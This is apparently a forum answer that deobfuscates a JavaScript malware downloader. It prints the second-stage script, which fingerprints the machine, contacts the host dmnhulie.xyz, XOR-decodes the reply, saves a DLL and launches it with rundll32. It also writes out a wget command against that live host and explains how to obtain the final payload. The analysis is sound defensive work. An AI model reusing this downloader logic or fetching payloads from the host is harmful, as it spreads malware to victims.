The decoded text is passed to eval at the end, so it's more Javascript, the next stage of the malware execution. Here is a copy with the boring inner functions removed and replaced by comments explaining what they do. The interesting stuff is in the RUN and DEC functions, and in the arguments provided in the last line.

(function(GLOBAL, HOST, ID, V){

        GLOBAL["UTILS"] = {
                "OBJ":
                  /* an object that wraps WScript.CreateObject and
                     provides a slightly obfuscated call-by-number
                     interface to create these types of objects:
                        1 = "MSXML2.XMLHTTP",
                        2 = "ADODB.Stream"
                        3 = "WScript.Network"
                        4 = "WScript.Shell"
                        5 = "Shell.Application"
                        6 = "Scripting.FileSystemObject" */
                "XOR": /* string XOR function */
                "PRE": /* function to hexify a string */
                "UNP": /* function to unhexify a string */
                "STR":
                  /* an object that wraps ADODB.Stream and provides
                     a call-by-number interface to some methods:
                       0 = write
                       1 = readAsText
                       2 = loadFile
                       3 = saveFile
                       4 = close */
                "REQ":
                  /* a function that does a GET request with
                     MSXML2.XMLHTTP and writes the result to a STR
                     (wrapped ADODB.Stream) object which is returned */
                "DEC": function(data){
                        var stream = new GLOBAL["UTILS"]["STR"];
                    var file = WSH.ScriptFullName;
                    var pos = parseInt(data.substr(0, 4), 16);
                    var len = data.charCodeAt(4);
                    var data;
                    var key;

                    stream[2](file);
                    key = stream[1](pos, len);
                    data = data.substr(5);

                    return GLOBAL["UTILS"]["XOR"](key, data);
                },
                "RUN": function(){

                        try{
                                GLOBAL["UTILS"]["TMP"]  =  GLOBAL["UTILS"]["PRE"]([ID, V, GLOBAL["UTILS"]["OBJ"][0](3).ComputerName.toUpperCase(), GLOBAL["UTILS"]["OBJ"][0](4).RegRead("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\InstallDate")].join("|"));
                                GLOBAL["UTILS"]["TMP"]  = GLOBAL["UTILS"]["REQ"]([HOST, GLOBAL["UTILS"]["TMP"]].join("/?"));

                                if(GLOBAL["UTILS"]["TMP"] === false){
                                WSH.Quit();
                            }

                            GLOBAL["UTILS"]["TMP"] = GLOBAL["UTILS"]["DEC"](GLOBAL["UTILS"]["TMP"][1]());
                            GLOBAL["UTILS"]["VAR1"] = GLOBAL["UTILS"]["UNP"](GLOBAL["UTILS"]["TMP"].split("|")[0]);
                            GLOBAL["UTILS"]["VAR2"] = GLOBAL["UTILS"]["UNP"](GLOBAL["UTILS"]["TMP"].split("|")[1]);
                            GLOBAL["UTILS"]["VAR3"] = GLOBAL["UTILS"]["UNP"](GLOBAL["UTILS"]["TMP"].split("|")[2]);
                            GLOBAL["UTILS"]["VAR6"] = GLOBAL["UTILS"]["UNP"](GLOBAL["UTILS"]["TMP"].split("|")[3]);


                        GLOBAL["UTILS"]["VAR4"] = GLOBAL["UTILS"]["OBJ"][0](5).Namespace(35).Self.Path + GLOBAL["UTILS"]["VAR2"];
                        GLOBAL["UTILS"]["VAR2"] = GLOBAL["UTILS"]["VAR4"].substr(0, GLOBAL["UTILS"]["VAR4"].lastIndexOf("\\"));
                                GLOBAL["UTILS"]["VAR5"] =  GLOBAL["UTILS"]["OBJ"][0](6);

                        if(GLOBAL["UTILS"]["VAR5"].FolderExists(GLOBAL["UTILS"]["VAR2"]) != 0){
                                WSH.Quit();
                        }

                    GLOBAL["UTILS"]["VAR5"].CreateFolder(GLOBAL["UTILS"]["VAR2"]);

                    GLOBAL["UTILS"]["TMP"]  = GLOBAL["UTILS"]["REQ"]([HOST, GLOBAL["UTILS"]["VAR1"]].join("/?"));

                        if(GLOBAL["UTILS"]["TMP"]){
                                GLOBAL["UTILS"]["TMP"][3](GLOBAL["UTILS"]["VAR4"]);
                                eval(GLOBAL["UTILS"]["VAR6"])
                            }

                        }catch(e){}
                }
        };

        return GLOBAL;

})(this, "https://dmnhulie.xyz", "b917aff9c439c45d78ac214d91e75186", "0.2.4_js")["UTILS"]["RUN"]();

Matching up the arguments in the last line with the parameters in the first, we see that HOST is https://dmnhulie.xyz, ID is b917aff9c439c45d78ac214d91e75186, and V is 0.2.4_js.

In the RUN method, this line:

GLOBAL["UTILS"]["TMP"]  =  GLOBAL["UTILS"]["PRE"]([ID, V, GLOBAL["UTILS"]["OBJ"][0](3).ComputerName.toUpperCase(), GLOBAL["UTILS"]["OBJ"][0](4).RegRead("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\InstallDate")].join("|"));

creates an identifier that includes the ID and V constants, your computer's hostname, and an installtion date. Obviously they are using this to keep track of machines they have infected. My guess for the ID constant is that it represents a particular payload that they've been paid to install on infected machines. Or maybe it represents a specific spam run, or possibly even a specific spam recipient address. V certainly looks like it could be an identifier for the infection method - the Javascript itself.

The 4 components are joined with a | separator and the whole thing is hex-encoded. I put together a test string like this:

b917aff9c439c45d78ac214d91e75186|0.2.4_js|STUPIDVICTIM|1000000000

and hex-encoded it, producing this:

62393137616666396334333963343564373861633231346439316537353138367c302e322e345f6a737c53545550494456494354494d7c31303030303030303030

and simulated the next line:

GLOBAL["UTILS"]["TMP"]  = GLOBAL["UTILS"]["REQ"]([HOST, GLOBAL["UTILS"]["TMP"]].join("/?"));

by doing this:

wget -O trojan_payload 'https://dmnhulie.xyz/?62393137616666396334333963343564373861633231346439316537353138367c302e322e345f6a737c53545550494456494354494d7c31303030303030303030'

That gives back a small file which is needed for the next stage.

The next line:

GLOBAL["UTILS"]["TMP"] = GLOBAL["UTILS"]["DEC"](GLOBAL["UTILS"]["TMP"][1]());

Calls the readAsText STR method to convert the stream to a string and then passes the result to the DEC method.

DEC expects the string to contain a number (pos) formatted as a hex string in the first 4 bytes, a length (len) in the next byte (not formatted as text), and the rest is an encoded payload. I got different values of pos and len when I repeated the request. It seems to be randomized.

The script again reads its own source code to find an XOR decryption key, this time using pos and len. In one of my attempts, the first 5 bytes of trojan_payload were 15194. That means the key starts at position 0x1519 = 5401 and is 52 bytes long (52 is the ASCII character code for the character 4 - the fact that the length byte is an ASCII digit is just a coincidence. It doesn't represent the number 4 here.)

The offset of 5401 bytes in the original script lands in the middle of the code string. Taking 52 bytes from that position you get 2|52|4|63|65|9|113|95|69|10|47|66|13|90|39|31|71|48| as the XOR key to decrypt the remainder of trojan_payload. The result of that decryption is

31623562656161303330346165663264313735343633643862356531636265366566343562663862|5c57697a4d6f7573655c506167652d506167652e646c6c|3030303031383837|474c4f42414c5b275554494c53275d5b274f424a275d5b305d2834292e72756e282772756e646c6c33322020272b20474c4f42414c5b275554494c53275d5b2756415234275d202b20272c23312027202b20474c4f42414c5b275554494c53275d5b2756415233275d29

which is returned by the DEC method.

Note to anyone trying to recreate this result: when you cut and paste the original script from the question, you must save it with CRLF line endings to have everything land at the correct byte offset.

That gets split into 4 parts at the | separators and each part is de-hexified with UNP. The parts are:

1b5beaa0304aef2d175463d8b5e1cbe6ef45bf8b

\WizMouse\Page-Page.dll

00001887

GLOBAL['UTILS']['OBJ'][0](4).run('rundll32  '+ GLOBAL['UTILS']['VAR4'] + ',#1 ' + GLOBAL['UTILS']['VAR3'])

The first part is still a hex string because it was doubly hex-encoded. It becomes VAR1 which is used in the next REQ call, to request https://dmnhulie.xyz/?1b5beaa0304aef2d175463d8b5e1cbe6ef45bf8b

So I requested that URL and got a copy of the real payload: a DLL containing the string "Crypter.dll" which matches the one described here:

https://www.virustotal.com/en/file/b13e274e8c191671fe58127b3d9461df16e10acc3ff02e698119e1e8eabd924e/analysis/

You can't just go directly to the final download URL. The 1b5beaa0304aef2d175463d8b5e1cbe6ef45bf8b token appears to be assigned for a single use only. When I tried to get it again, I got a 400 Bad Request error. You have to do the intermediate request, decode the small payload file with pos and len to get the 4-part response, and then you have a token you can use to download the real payload.

These results may not even be reproducible at all (although I did it 3 times and got the same DLL each time) because one of the major reasons for distributing a malware downloader is so you can cause different victims to download different payloads, or the same victim to download different payloads at different times.

I didn't analyze much after I got the DLL. The other 3 parts of the decoded trojan_payload appear to be a random filename where the DLL will be saved (VAR2 = \WizMouse\Page-Page.dll), a command line argument for the rundll32 call (VAR3 = 00001887), and another chunk of Javascript to call rundll32:

VAR6 =
GLOBAL['UTILS']['OBJ'][0](4).run('rundll32  '+ GLOBAL['UTILS']['VAR4'] + ',#1 ' + GLOBAL['UTILS']['VAR3'])

Wow, very complete answer, way more than I expected. Thank you a lot! As I said, I've reported the website I got this from and linked this question for details, as your answer is pretty great. Thanks again. — Zeh, Jun 27 '16 at 02:40

How to de-obfuscate a malicious payload?

1 Answers1